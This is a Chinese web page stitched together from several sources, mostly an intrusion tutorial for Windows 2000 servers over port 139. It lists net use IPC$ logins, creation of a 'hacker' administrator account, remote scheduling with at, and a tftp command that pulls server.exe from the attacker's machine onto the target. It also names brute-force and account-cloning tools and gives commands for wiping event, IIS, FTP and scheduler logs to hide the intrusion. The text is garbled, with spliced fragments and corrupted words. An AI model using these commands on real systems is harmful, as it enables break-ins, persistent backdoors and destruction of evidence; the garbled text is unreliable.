OK,它的服務停掉了,同時也停掉了與它有依賴關系的服務。再來試著刪一下! D:\SERVER>del schedlgu.txt D:\SERVER> 沒有反應?成功了!下一個是FTP日誌和WWW日誌,原理都是一樣,先停掉相關服務,然後再刪日誌! D:\SERVER\sys tem32\LogFiles\MSFTPSVC1>del ex*.log D:\SERVER\sys tem32\LogFiles\MSFTPSVC1> 以上操作成功刪除FTP日誌!再來WWW日誌! D:\SERVER\sys tem32\LogFiles\W3SVC1>del ex*.log D:\SERVER\sys tem32\LogFiles\W3SVC1> OK!恭喜,現在簡單的日誌都已成功刪除。下面就是很難的安全日誌和系統日誌了,守護這些日誌的服務是Event Log,試著停掉它! D:\SERVER\sys tem32\LogFiles\W3SVC1>net stop eventlog 這項服務無法接受請求的 "暫停" 或 "停止" 操作。 KAO,I 服了 U,沒辦法,它是關鍵服務。如果不用第三方工具,在命令行上根本沒有刪除安全日誌和系統日誌的可能!所以還是得用雖然簡單但是速度慢得死機的辦法:打開「控制面板」的「管理工具」中的「事件查看器」(98沒有,知道用Win2k的好處了吧),在菜單的「操作」項有一個名為「連接到另一台計算機」的菜單,點擊它如下圖所示: 輸入遠程計算機的IP,然後點支煙,等上數十分鍾,忍受象死機的折磨,然後打開下圖: 選擇遠程計算機的安全性日誌,右鍵選擇它的屬性: 點擊屬性里的「清除日誌」按鈕,OK!安全日誌清除完畢!同樣的忍受痛苦去清除系統日誌! 目前在不藉助第三工具的情況下,能很快,很順利地清除FTP、WWW還有Schedlgu日誌,就是系統日誌和安全日誌屬於Windows2000的嚴密守護,只能用本地的事件查看器來打開它,因為在圖形界面下,加之網速又慢,如果你銀子多,時間閑,還是可以清除它的。綜上所述,介紹了Windows2000的日誌文件以及刪除方法,但是你必須是Administrator,注意必須作為管理員或管理組的成員登錄才能打開安全日誌記錄。該過程適用於 Windows 2000 Professional 計算機,也適用於作為獨立伺服器或成員伺服器運行的 Windows 2000 Server 計算機。
H. 如何通過dos 命令連接遠程主機,連接後怎麼控制
常用的DOS命令建立到遠程主機的連接
net use \\ip\ipc$ "password"
/user:"username"
建立新用戶
net user username password /add
修改用戶密碼
net
user username newpassword
激活用戶
net user username
/active:yes
把用戶加入到用戶組
net localgroup groupname username
/add
查看遠程主機的時間
net time \\ip
顯示遠程主機的共享資源列表
net view
\\ip
啟動和停止系統服務
net start(stop) servicename
映射對方的硬扮歷盤
net use z:
\\ip\c$
啟動程序
at \\ip time programnane
文件復制
filename
\\ip\c$\filename
遠程執行FTP命令
echo open servername > c:\ftp.txt
echo
username >> c:\ftp.txt
echo password >> c:\ftp.txt
echo get
filename c:\filename >> c:\ftp.txt
ftp -s:c:\ftp.txt
del
c:\ftp.txt
刪除日誌
del c:\winnt\system32\logfiles\*.*
del
c:\winnt\ssytem32\config\*.evt
del c:\winnt\system32\dtclog\*.*
del
c:\winnt\system32\*.log
del c:\winnt\system32\*.txt
del c:\winnt\*.txt
del c:\winnt\*.log
訪問對方共享資源
net use \\192.168.1.1\c$
/user:administrator "123"
如果提示連接成功,你在輸入
start \\192.168.1.1\c$
就打開目標機的C盤了
----------------------------------
net use \\ip\ipc$ " "
/user:" " 建立IPC空鏈接
net use \\ip\ipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接
net use
h: \\ip\c$ "密碼" /user:"用戶名" 直接登陸後映射對方C:到本地為H:
net use h: \\ip\c$
登陸後映射對方C:到本地為H:
net use \\ip\ipc$ /del 刪除IPC鏈接
net use h: /del
刪除映射對方到本地的為H:的映射
net user 用戶名密碼/add 建立用戶
net user guest /active:yes
激活guest用戶
net user 查看有哪些用戶
net user 帳戶名 查看帳戶的屬性
net localgroup
administrators 用戶名 /add 把「用戶」添加到管理員中使其具有管廳塵搜理員許可權,注意:administrator後加s用復數
net
start 查看開啟了哪些服務
net start 服務名 開啟服務;(如:net start telnet, net start schele)
net stop 服務名 停止某服務
net time \\目標ip 查看對方時間
net time \\目標ip /set
設置本地計算機時間與「目標IP」主機的時間同步,加上參數/yes可取消確認信息
net view 查看本地區域網內開啟了哪些共享
net
view \\ip 查看對方區域網內開啟了哪些共享
net config 顯示系統網路設置
net logoff 斷開連接的共享
net
pause 服務名 暫停某服務
net send ip "文本信息" 向對方發信息
net ver 區域網內正在使用的網路連接類型和信息
net share 查看本地開啟的共享
net share ipc$ 開啟ipc$共享
net share ipc$ /del
刪除ipc$共享
net share c$ /del 刪除C:共享
net user guest 12345
用guest用戶登陸後用將密碼改為12345
net password 密碼 更改系統登陸密碼
netstat -a
查看開兄州啟了哪些埠,常用netstat -an
netstat -n 查看埠的網路連接情況,常用netstat -an
netstat -v
查看正在進行的工作
netstat -p 協議名 例:netstat -p tcq/ip 查看某協議使用情況(查看tcp/ip協議使用情況)
netstat -s 查看正在使用的所有協議使用情況
nbtstat -A ip
對方136到139其中一個埠開了的話,就可查看對方最近登陸的用戶名(03前的為用戶名)-注意:參數-A要大寫
tracert -參數
ip(或計算機名) 跟蹤路由(數據包),參數:「-w數字」用於設置超時間隔。
ping ip(或域名)
向對方主機發送默認大小為32位元組的數據,參數:「-l[空格]數據包大小」;「-n發送數據次數」;「-t」指一直ping。
ping -t -l
65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows
NT及XP(windows 95 98)查看本地ip地址,ipconfig可用參數「/all」顯示全部配置信息
tlist -t
以樹行列表顯示進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)
kill -F 進程名
加-F參數後強制結束某進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)
del -F 文件名
加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件,/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如「DEL/AR
*.*」表示刪除當前目錄下所有隻讀文件,「DEL/A-S *.*」表示刪除當前目錄下除系統文件以外的所有文件
#2 二:
del /S /Q 目錄
或用:rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q 可取消刪除操作時的系統確認就直接刪除。(二個命令作用相同)
move 盤符\路徑\要移動的文件名存放移動文件的路徑\移動後文件名 移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋
fc
one.txt two.txt > 3st.txt 對比二個文件並把不同之處輸出到3st.txt文件中,"> "和"> >"
是重定向命令
at id號 開啟已注冊的某個計劃任務
at /delete 停止所有計劃任務,用參數/yes則不需要確認就直接停止
at
id號 /delete 停止某個已注冊的計劃任務
at 查看所有的計劃任務
at \\ip time 程序名(或一個命令) /r
在某時間運行對方某程序並重新啟動計算機
finger username @host 查看最近有哪些用戶登陸
telnet ip 埠
遠和登陸伺服器,默認埠為23
open ip 連接到IP(屬telnet登陸後的命令)
telnet 在本機上直接鍵入telnet
將進入本機的telnet
路徑\文件名1路徑\文件名2 /y
復制文件1到指定的目錄為文件2,用參數/y就同時取消確認你要改寫一份現存目錄文件
c:\srv.exe \\ip\admin$
復制本地c:\srv.exe到對方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg
將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件,註:2st.txt文件頭要空三排,參數:/b指二進制文件,/a指ASCLL格式文件
\\ip\admin$\svv.exe c:\ 或:\\ip\admin$\*.*
復制對方admini$共享下的srv.exe文件(所有文件)至本地C:
x 要復制的文件或目錄樹目標地址\目錄名
復制文件和目錄樹,用參數/Y將不提示覆蓋相同文件
tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe
c:\server.exe 登陸後,將「IP」的server.exe下載到目標主機c:\server.exe
參數:-i指以二進制模式傳送,如傳送exe文件時用,如不加-i 則以ASCII模式(傳送文本文件模式)進行傳送
tftp -i 對方IPput
c:\server.exe 登陸後,上傳本地c:\server.exe至主機
ftp ip 埠
用於上傳文件至伺服器或進行文件操作,默認埠為21。bin指用二進制方式傳送(可執行文件進);默認為ASCII格式傳送(文本文件時)
route
print 顯示出IP路由,將主要顯示網路地址Network addres,子網掩碼Netmask,網關地址Gateway
addres,介面地址Interface
arp 查看和處理ARP緩存,ARP是名字解析的意思,負責把一個IP解析成一個物理性的MAC地址。arp
-a將顯示出全部信息
start 程序名或命令 /max 或/min 新開一個新窗口並最大化(最小化)運行某程序或命令
mem
查看cpu使用情況
attrib 文件名(目錄名) 查看某文件(目錄)的屬性
attrib 文件名 -A -R -S -H 或 +A +R +S
+H 去掉(添加)某文件的 存檔,只讀,系統,隱藏 屬性;用+則是添加為某屬性
dir
查看文件,參數:/Q顯示文件及目錄屬系統哪個用戶,/T:C顯示文件創建時間,/T:A顯示文件上次被訪問時間,/T:W上次被修改時間
date /t 、
time /t 使用此參數即「DATE/T」、「TIME/T」將只顯示當前日期和時間,而不必輸入新日期和時間
set
指定環境變數名稱=要指派給變數的字元 設置環境變數
set 顯示當前所有的環境變數
set p(或其它字元)
顯示出當前以字元p(或其它字元)開頭的所有環境變數
pause 暫停批處理程序,並顯示出:請按任意鍵繼續....
if
在批處理程序中執行條件處理(更多說明見if命令及變數)
goto 標簽
將cmd.exe導向到批處理程序中帶標簽的行(標簽必須單獨一行,且以冒號打頭,例如:「:start」標簽)
call 路徑\批處理文件名
從批處理程序中調用另一個批處理程序 (更多說明見call /?)
for 對一組文件中的每一個文件執行某個特定命令(更多說明見for命令及變數)
echo on或off 打開或關閉echo,僅用echo不加參數則顯示當前echo設置
echo 信息 在屏幕上顯示出信息
echo
信息 >> pass.txt 將"信息"保存到pass.txt文件中
findstr "Hello" aa.txt
在aa.txt文件中尋找字元串hello
find 文件名 查找某文件
title 標題名字 更改CMD窗口標題名字
color 顏色值
設置cmd控制台前景和背景顏色;0=黑、1=藍、2=綠、3=淺綠、4=紅、5=紫、6=黃、7=白、8=灰、9=淡藍、A=淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白
prompt 名稱 更改cmd.exe的顯示的命令提示符(把C:\、D:\統一改為:EntSky\ )
139埠入侵
net
命令是139埠入侵的重中之重,整個入侵過程會多次用到它。在命令行窗口下輸入net,可以看到有一大堆參數,別被這一大堆參數嚇懷了,現在我來為你一一講解。
net
use
net use
命令用於與遠程主機建立IPC$(管理)連接,當你有遠程計算機的用戶名(通常用戶名為administrator,記住它)和密碼時,在命令行窗口下輸入net
use\\IP\IPC$"password"/user:administrator,你就成功地建立了與遠程計算機的連接。在這之後,可以對其進行管理了。net
use 還有一個用處,即映射遠程機器的共享資源,輸入net use z: \\IP\C$
(注意!在此之後的一切命令都是基於第一個命令的,也就是說必須先建立IPC$連接後,這些命令才會成功),打開「我的電腦」,你會發現多了一個Z盤,裡面全是遠程主機C盤下的東西,你在Z盤里刪除了一個文件,對方C盤下的這個文件就也被刪除了,所有對Z盤的操作其實就是對遠程計算機的C
盤的操作。怎麼樣,是不是很有意思呢?
net view
net view 用於查看遠程計算機有哪些共享資源,通常你會看到my
document之類的共享文件夾,輸入net view \\IP即可。我個人認為net view
沒有太大用處,要知道,在Windows2000中,各個硬碟都是共享的,但是如果你用net view 來查看,你會發現並無C,D,E
之類的共享資源。這是為什麼呢?注意,在這之前的一些命令中,我們曾輸入過IPC$,C$這樣的奇怪東西,其實,Windows2000中,帶"$"後綴的共享資源是隱藏的,在命令行窗口下是無法看到的,Windows2000中各個盤都是以諸如C$,D$,E$
這樣的名稱共享的,所以我們看不到,但確實存在,IPC$也是如此。
net share
net share 用於開放共享,輸入net
share QQ=c:\tencent,你會發現多了一個名為QQ的共享資源。這個命令有慎么作用呢?假設一個主機安全做的不錯,關閉了IPC$,C$,D$
等共享,那麼我們就無法在139埠上建立管理連接,也無法訪問對方的C盤,當我們通過別的手段進入後(如遠程溢出),我們就可以用net share
開放IPC$,從而轉為熟悉的139埠的入侵,開放IPC$ 的命令為net share IPC$。相應的,如果你想關閉共享,你可以加上/del 後綴,例如net
share c$ /del 就關閉了C盤的共享。
net user
net user 命令用於管理主機上的用戶,僅輸入不帶任何參數的net
user 會列出計算機上所有的用戶名。現在就讓我們看看net user
命令是如何對用戶進行操作的。
┎───────────────────────────────────────────────────────┒
┃
net user hacker 12345 /add 建立一個名為hacker,密碼為12345的用戶。
┃
┃ net user hacker /del
刪除名為hacker的用戶。┃
┃ net user hacker
/active:no 禁用hacker這個用戶,這個用戶不能再登陸此計算機。┃
┃ net user hacker
/active:yes 激活已禁用的hacker這個用戶。 ┃
┃ net localgroup
administrator hacker /add 把hacker這個用戶添加進管理員組,即提升hacker的許可權,使之變為管理員 ┃
┖───────────────────────────────────────────────────────┚
net start /
net stop
net start / net stop 命令用於起動/停止系統服務,通常我們會net stop w3svc
(停止網頁服務),然後替換網頁,對此命令我不多講,知道即可。
*at 命令,net
time
之所以把它們放在一起來講,是因為at命令要用到net time命令的結果,一般我們先 net view
\\ip,得到遠程主機的時間(假設得到的時間為9:00),然後at \\ip 9:00 telnet
就啟動了telnet服務,at這個命令就是用來遠程運行程序的.
(5)需要准備的工具
肉雞獵手v1.0掃描一個網段,找出弱密碼的計算機
SMBCrack
針對特定主機,暴力猜解密碼
DameWare Mini Remote Control監控運程屏幕
CA.exe
克隆管理員賬號
I. windowstask怎麼看log
打開CSDN APP
Copyright © 1999-2020, CSDN.NET, All Rights Reserved
windows日誌文件
打開APP
windows日誌文件查看與清理 原創
2021-09-12 19:17:02
暗啞於秋~
碼齡3年
關注
日誌查看
(1) 啟動Windows實驗台,點擊:開始 - 控制面板 - 管理工具 - 事件查看器。如下圖所示。在這里插入圖片描述
(2) 應用程序日誌、安全日誌、系統日誌、DNS日誌默認位置:%sys temroot%\system32\config,默認文件大小512KB,管理員可以改變這個默認大小。
安全日誌文件:%systemroot%\system32\config\SecEvent.EVT;
系統日誌文件:%systemroot%\system32\config\SysEvent.EVT;
應用程序日誌文件:%systemroot%\system32\config\AppEvent.EVT;
DNS日誌:%systemroot%\system32\config\DnsEvent.EVT;
在事件查看器中右鍵應用程序(或安全性、系統、DNS伺服器)查看屬性可以得到日誌存放文件的路徑,並可修改日誌文件的大小,清除日誌。例如選中「應用程序」右鍵屬性,如下圖:
在這里插入圖片描述
選中事件查看器中左邊的樹形結構圖中的日誌類型(應用程序、安全性或系統),右擊「查看」,並選擇「篩選」。或者點擊屬性頁面的篩選器標簽,日誌篩告桐選器將會啟動。通過篩選器系統會過濾出管理員希望查看的日誌記錄
(3) 查看www和ftp日誌文件夾下的日誌文件
(由於實驗環境中不允許訪問互聯網,無法操作得出日誌文件。請參考指導書使用個人電腦進行實驗。)
嘗試對www服務中某一文件進行訪問,則日誌中則會有相應的日誌記錄如下圖。
在這里插入圖片描述
日誌中記錄了訪問www服務的請求地址,管理員可以根據請求地址,發現網路上的攻擊,管理員可根據日誌信息,採取一稿高定的防護措施。
在這里插入圖片描述
ftp的日誌中同樣會記錄ftp服務的登陸用戶,以及登陸之後的操作。
(4) 計劃任務日誌
當入侵者得到遠程系統的shell之後,常會利用計劃任務運行功能更加強大的木馬程序,計劃任務日誌詳細的記錄的計劃任務的執行時間,程序名稱等詳細信息。
打開計劃任務文件夾,點擊「高級」-查看日誌,即可查看計劃任務日誌。
在這里插入圖片描述
日誌清除
(1) 刪除事件查看器中的日誌
主機下載使用elsave清除日誌工具
下載地址:http://tools.hetianlab.com/tools/Elsave.rar
先用ipcKaTeX parse error: Undefined control sequence: \ipc at position 42: …e \\對方IP(實驗台IP)\̲i̲p̲c̲ 「密碼」 /user:「用戶名」;
連接成功後,開始進行日誌清除。
清除目標系統的應用程序日誌輸入elsave.exe -s \對方ip -l 「application」 -C
清除目標系統的系統日襪敬坦志輸入elsave.exe -s \對方IP -l 「system」 -C
清除目標系統的安全日誌輸入elsave.exe -s \對方IP -l 「security」 -C
輸入如下圖
在這里插入圖片描述
回車後可以查看遠程主機內的系統日誌已經被刪除了
在這里插入圖片描述
(2) 刪除常見服務日誌
IIS的日誌功能,它可以詳細的記錄下入侵全過程,如用unicode入侵時IE里打的命令,和對80埠掃描時留下的痕跡。
手動清除:日誌的默認位置:%systemroot%\system32\logfiles\w3svc1\,默認每天一個日誌。進入到遠程主機後(也可直接在實驗台中操作),cmd下切換到這個目錄下,然後 del .。或者刪除某一天的日誌。如果無法刪除文件,首先需要停止w3svc服務,再對日誌文件進行刪除,使用net 命令停止服務如下:
C:>net stop w3svc
World Wide Web Publishing Service 服務正在停止。
World Wide Web Publishing Service 服務已成功停止。
日誌w3svc停止後,然後清空它的日誌, del .
C:>net start w3svc
清除ftp日誌,日誌默認位置:%systemroot%\sys tem32\logfiles\msftpsvc1\,默認每天一個日誌,清除方法同上。
(3) 刪除計劃任務日誌
先來刪除計劃任務日誌:
在實驗台中命令行進入日誌所在文件夾下(%systemroot%\Tasks), 刪除schedlgu.txt , 提示無法訪問文件,因為另一個程序正在使用此文件。說明服務保護,需要先把服務停掉。命令行中輸入net stop schele;
在這里插入圖片描述
下面的服務依賴於Task Scheler 服務。停止Task Scheler 服務也會停止這些服務。
Remote Storage Engine
Task Scheler 服務正在停止. Task Scheler 服務已成功停止。
如上顯示服務停掉了,同時也停掉了與它有依賴關系的服務。再來刪除schedlgu.txt;
刪除後需要再次啟動該任務以便主機能夠正常工作,輸入net start schele:
在這里插入圖片描述
答案
在這里插入圖片描述
分析與思考
1、還有哪些途徑可以發現網路中存在的攻擊或者入侵。
日誌文件、進程、自啟動項目、網路連接、安全模式、映像劫持、CPU時間
2、清理日誌能否把所有的痕跡都清理干凈。
不能,還應刪除操作記錄,所做的每一個操作,都要被抹掉;所上傳的工具,都應該被安全地刪掉
補充
電腦被入侵排查方法
在攻擊結束後,如何不留痕跡的清除日誌和操作記錄,以掩蓋入侵蹤跡,這其實是一個細致的技術活。你所做的每一個操作,都要被抹掉;你所上傳的工具,都應該被安全地刪掉。
打開CSDN,閱讀體驗更佳
什麼是Windows日誌?_運維有小鄧@的博客_windows日誌
Windows日誌特指Windows操作系統中各種各樣的日誌文件,如應用程序日誌,安全日誌、系統日誌、Scheler服務日誌、FTP日誌、WWW日誌、DNS伺服器日誌等,這些根據你的系統開啟的服務的不同而有所不同。我們在系統上進行一些操作時,這些日誌文件通...
繼續訪問
Windows升級日誌文件可以刪除嗎?_石大師的博客_日誌文件可以...
3、等到搜索完畢後,按下CTRL + A 快捷鍵,全選Log文件,按下del鍵刪除。 4、最後清空回收站,就可以刪除Windows升級日誌文件了。
繼續訪問
Windows系統冗餘log的清理bat腳本
Windows系統冗餘log的清理bat腳本
繼續訪問
熱門推薦 Windows系統日誌分析
Windows系統的日誌文件存放在C:/windows/system32/winevt/logs目錄下 Windows系統的日誌分為三種 系統日誌:System.evtx (系統組件等日誌) 應用程序日誌: Application.evtx (應用程序等日誌) 安全日誌:Security.evtx(系統登錄等日誌) win+r打開運行窗口中輸入eventvwr.msc打開時間查看器,或者cmd中輸入eventvwr.msc ...
繼續訪問
Widows Log Files (windows日誌文件)_DoveFeng的博客_w11日誌...
DNS Client service默認沒有設置日誌紀錄。可以通過在%systemroot%/system32 目錄下手動添加dnsrslvr.log文件,用來紀錄事件日誌 :/WINDOWS/system32/>echo "" > dnsrslvr.log 在Windows XP和windows server2003中,必須明顯指定給 NETWORK...
繼續訪問
win10如何查看伺服器日誌文件,高手解讀win10怎麼查看日誌文件的操作教程...
1、右鍵左下角"菜單"鍵,然後點擊"事件查看器"。 2、然後點擊"Windows日誌",就能夠進行查看了。 win10怎麼查看日誌文件的問題是不是大家根據以上提供的教程就處理好了呢?我們高興能夠在這里幫助到你。
繼續訪問
最新發布 應急響應-日誌分析
日誌概述在Windows系統中,日誌文件包括:系統日誌、安全性日誌、應用程序日誌:如何查看:右鍵我的電腦-管理-系統工具-事件查看器,或者eventvwr查看事件查看器打開Windows系統的事件查看器,右鍵單擊系統或安全日誌,選擇篩選當前日誌,在篩選器中輸入下列事件ID即可。系統:1074,通過這個事件ID查看計算機的開機、關機、重啟的時間以及原因和注釋。6005,表示計算機日誌服務已啟動,如果出現了事件ID為6005,則表示這天正常啟動了系統。
繼續訪問
windows查看伺服器啟動日誌文件,windows伺服器日誌查看工具
windows伺服器日誌查看工具 內容精選換一換本節操作指導用戶查看Windows彈性雲伺服器的登錄日誌。本節操作以2012操作系統雲伺服器為例。登錄彈性雲伺服器。選擇「開始 > 管理工具 > 事件查看器 」。打開「 Windows日誌 > 安全 > 篩選當前日誌」。篩選事件ID為4776的事件即為遠程登錄日誌。您還可以使用4624和4625查看登錄信息。4624:Wind...
繼續訪問
windows日誌總結_ordar123的博客_windows日誌
windows日誌總結 開啟審核策略 運行secpol.msc可以打開本地安全策略,依次點開本地策略-審核策略。可以看到windows默認情況是沒有開啟審核策略的,不開啟策略的話,windows就不會記錄某些事件,比如登錄事件,進程創建事件等等。
繼續訪問
Windows系統伺服器系統日誌在哪裡查看?_PAINzw的博客_伺服器...
5.根據文件位置,咱們去C盤/Windows/system32/winevt/logs找到系統日誌,即可查看,我個人覺得一個一個找文件挺麻煩的,所以我是直接找到system32文件夾後直接搜索【logs】文件夾,一步到位 注意:選擇系統日誌可進行查看,並且在日誌管理頁面中...
繼續訪問
在windows下,使用命令清除日誌信息
清除日誌信息的命令:del C:/winnt/system32/logfiles/*.* del C:/winnt/system32/config/*.evt del C:/winnt/system32/dtclog/*.* del C:/winnt/system32/*.log del C:/winnt/system32/*.txt del C:/winnt/*.txt
繼續訪問
安全清理大部分的C盤內存(一般10GB以上)
1.我電腦清理後騰出了80G的C盤空間,用了以下方法 如果感覺有用請關注,點贊,收藏! 下次分享更有用的干貨~ 1.先用清理軟體(360,騰訊管家) 用360清理發現,windows search日誌佔用了70多個G空間,先清除! 該日誌文件有撒用呢? 如果沒有這個日誌文件,我們在文件系統進行搜索的時候就會比較慢了,而且還會出現這樣的字樣。 這個日誌主要是用來存索引的, 刪除了只會在下次搜索東西的時候比較慢! 對其他沒有任何影響!!!! 2.禁用該日誌文件 1...
繼續訪問
計算機操作日誌文件,教你完全讀懂Windows日誌文件
日誌文件,它記錄著Windows 及其各種服務運行的每個細節,對加強 Windows的穩定和安全性,起著十分 重要的作用。但許多用戶不注意對它保護,一些「不速之客」很隨便 就將日誌文件清空,給系統帶來嚴重的安全隱患。一、什麼是日誌文件日誌文件是Windows 中一個比較特殊的文件,它記錄著Windows 中所發作 的一切,如各種系統服務的啟動、運行、關閉等信息。 Windows日誌包括應用程序、安...
繼續訪問
windows日誌查看與清理
使用elsave清除日誌工具 先用ipc$管道進行連接,在cmd命令提示符下輸入 net use \\對方IP(實驗台IP)\ipc$ "密碼" /user:"用戶名"; 連接成功後,開始進行日誌清除。 清除目標系統的應用程序日誌輸入elsave.exe -s \\對方ip -l "application" -C 清除目標系統的系統日誌輸入elsave.exe -s \\對方IP -l "system" -C 清除目標系統的安全日誌輸入elsave.ex...
繼續訪問
Windows下如何查看十幾G的日誌文件
周二工作中,為了查明一個bug產生的原因,記錄了近30個小時的test環境的日誌文件hrmkq.log。拿到的日誌文件解壓後有30G,這是任何文本編輯器都無法處理的大小。這里介紹一下windows環境分析大文件的好工具——LogViewer (http://www.uvviewsoft.com/logviewer/index.htm)。 官方介紹 UVviewsoft LogViewer 是一款無限大小的文本日誌文件的查看器。(UVviewsoft LogViewer is a viewer for t
繼續訪問
2.3 IIS日誌分析:手動清除IIS日誌
IIS 日誌
繼續訪問
Windows環境使用tail命令動態查詢日誌文件
Windows環境使用tail命令動態查詢日誌文件
繼續訪問
Windows常用快捷鍵
Windows常用快捷鍵 系統快捷鍵 快捷鍵 作用 Windows+E 打開我的電腦 Window+Prtscr 屏幕截圖並放在剪貼板裡面,並存儲文件到圖片文件夾 Window+數字鍵 打開任務欄第幾個應用程序 Window+D 顯示桌面/最小化窗口,可返回 Window+Q 搜索 Window+M 最小化所有窗口/不可返回 Window+R 打開運行對話框...
繼續訪問
日誌文件
1. 日誌文件 日誌文件可以記錄系統在什麼時間、哪個主機、哪個服務、出現了什麼信息等內容,這些信息也包括用戶識別數據、系統故障排除須知等信息 日誌文件就是記錄系統活動信息的幾個文件,如:何時、何地(來源IP)、何人(什麼服務名稱)、做了什麼操作(信息登錄)換句話說就是記錄系統在什麼時候由哪個進程做了什麼樣的操作時,發生了何種的事件 日誌文件的作用: 解決系統方面的錯誤 解決網路服務的問題 過往事件記事本 ...
繼續訪問
win7開機慢_電腦慢怎麼辦?小白如何快速提升電腦的速度,只要這9步!全網最詳細、簡單落地,小白易上手操作方法...
重要說明:按此教程操作完成後,電腦速度至少提升100%以上試想一下,如果電腦反應速度慢,我們的效率如何提升?別人1秒鍾可以操作的事情,我們可能10秒還完成不了,別人1小時能操作的事情,我們可能3小時間都完成不了,這就是工欲善其事,必先利其器!創業就跟打戰一樣,俗話說商場如戰場,落後就會挨打,中國近兩百年就是這樣過來的,不過,現在中國慢慢趕上來了,各種先進的武器裝備都奮力趕上,很多還做到世界第一。所...
繼續訪問
關於Windows日誌
什麼是 Windows日誌? Windows網路操作系統都設計有各種各樣的日誌文件,如應用程序日誌,安全日誌、系統日誌、Scheler服務日誌、FTP日誌、WWW日誌、DNS伺服器日誌等等,這些根據你的系統開啟的服務的不同而有所不同。我們在系統上進行一些操作時,這些日誌文件通常會記錄下我們操作的一些相關內容,這些內容對系統安全工作人員相當有用。比如說有人對系統進行了IPC探測,系統就會在安全日誌里迅速地記下探測者探測時所用的IP、時間、用戶名等。 應用程序日誌記錄的是應用程序在系統中產生的事件信息。
繼續訪問
WindowsNT/2000的系統日誌文件
一.Windows日誌系統 WindowsNT/2000的系統日誌文件有應用程序日誌AppEvent.Evt、安全日誌SecEvent.Evt、系統日誌SysEvent.Evt,根據系統開通的服務還會產生相應的日誌文件。例如,DNS伺服器日誌DNS Serv.evt,FTP日誌、WWW日誌等。日誌文件默認存放位置:%systemroot%\system32\config,默認文件大小51
繼續訪問
SAP 事務代碼 sm21-系統日誌
對Windows下日誌清除的一些總結
這幾日研究的課題是系統日誌的清理,主要參考的書籍是《暗戰強人. 黑客攻防實戰高級演練》,雖然講到的技術比較老,但對於剛入門 的我還是收獲較大。 在Windows系統中,日誌文件通常有應用程序日誌、安全日誌、系統日誌、DNS伺服器日誌、FTP日誌、WWW日誌等,其擴展名為.log、 .txt。我們先來熟悉下各個日誌文件存放的位置及相應的服務。 系統
繼續訪問
在windows伺服器實現Linux cat/dev/null > 文件 功能
1. 前提是windows裝了powershell 2. 使用Clear-Content命令清空文件中內容 > 所謂清空文件,就是將一個文本文件裡面的內容全部刪除,但是不刪除文件本身 3. 案例 PS E:\ifield\logs> PS E:\ifield\logs> Clear-Content .\log.log PS E:\ifield\logs> ...
繼續訪問
windows日誌文件
J. linux message 日誌有如下信息是什麼情況
日誌的概念為了維護自身系統資源的運行狀況,計算機系統一般都會有相應的日誌記錄系統有關日常事件或者誤操作警報的日期及時間戳信息。這些日誌信息對計算機犯罪調查人員非常有用。所謂日誌(Log)是指系統所指定對象的某些操作和其操作結果按時間有序的集合。每個日誌文飢絕件由日誌記錄組成,每條日誌記錄描述了一次單獨的系統事件。通常情況下,系統日誌是用戶可以直接閱讀的文本文件,其中包含了一個時間戳和一個信息或者子系統所特有的其他信息。日誌文件為伺服器、工作站、防火牆和應用軟體等IT資源相關活動記錄必要的、有價值的信息,這對系統監控、查詢、報表和安全審計是十分重要的。日誌文件中的記錄可提供以下用途:監控系統資源;審計用戶行為;對可疑行為進行告警;確定入侵行為的范圍;為恢復系統皮山提供幫助;生成調查報告;為打擊計算機犯罪提供證據來源。日誌的特點日誌記錄著系統中特定事件的相關活動信息,從計算機取證角度看,日誌主要有以下特點:(1)不易讀懂雖然大部分系統的日誌都以文本的形式記錄,但由於各系統日誌格式不一致,不熟悉各類日誌格式就很難獲取有用的信息。同時有相當部分應用系統並不採用文本格式記錄著日誌信息,必須藉助專用的工具分析這些日誌,否則很難讀懂其中的日誌信息。(2)數據量大通常對外服務產生的日誌文件如Web服務日誌、防火牆、入侵檢測系統日誌和資料庫日誌以及各類伺服器日誌等都很大,一個日誌文件一天產生的容量少則幾十兆、幾百兆,多則有幾個G,幾十個G,這使得獲取和分析日誌信息變得很困難。(3)不易獲取由於網路中不同的操作系統、應用軟體、網路設備和服務產生不同的日誌文件,即使相同的服務如IIS也可採用不同格式的日誌文件記錄日誌信息。目前國際上還沒有形成標準的日誌格式,各系統開發商和網路設備生產商往往根據各自的需要制定自己的日誌格式,使得不同系統的日誌格式和存儲方式有所差別。如何獲取各類不同系統產生的不同日誌文件作為打擊計算機犯罪者的電子證據變得尤為困難。(4)不同日誌之間存在某種必然的聯系一個系統的日誌是對本系統涉及的運行狀況的信息按時間順序作一簡單的記錄,僅反映本系統的某些特定事件的操作情況,並不完全反映某一用戶的整個活動情況。一個用戶在網路活動的過程中會在很多的系統日誌中留下痕跡,如防火牆IDS日誌、操作系統日誌等,這些不同的日誌之間存在某種必然的聯系來反映用戶的活動情況。只有將多個系統的日誌結合起來分析,才能准確反映用戶活動情況。(5)容易被修改、破壞甚至偽造產生系統日誌的軟體通常為應用系統而不是作為操作系統的子系統運行,所產生的日誌記錄容易遭到惡意的破壞或修改。系統日誌通常存儲在系統未經保護的目錄中,並以文本方式存儲,未經加密和校驗處理,沒有提供防止惡意篡改的有效保護機制。因此,日誌文件並不一定是可靠的,入侵者可能會篡改日誌文件,從而不能被視為有效的證據。由於日誌是直接反映入侵者痕跡的,爛握姿在計算機取證中扮演著重要的角色,入侵者獲取系統許可權竊取機密信息或破壞重要數據後往往會修改或刪除與其相關的日誌信息,甚至根據系統的漏洞偽造日誌以迷惑系統管理員和審計。 Unix系統日誌在Unix下,最常用的存放日誌文件的目錄是: /usr/adm 早期版本的 Unix /var/adm 較新版本的 Unix /var/log 用於Solaris,Linux,BSD等 /etc Unix system V早期版本 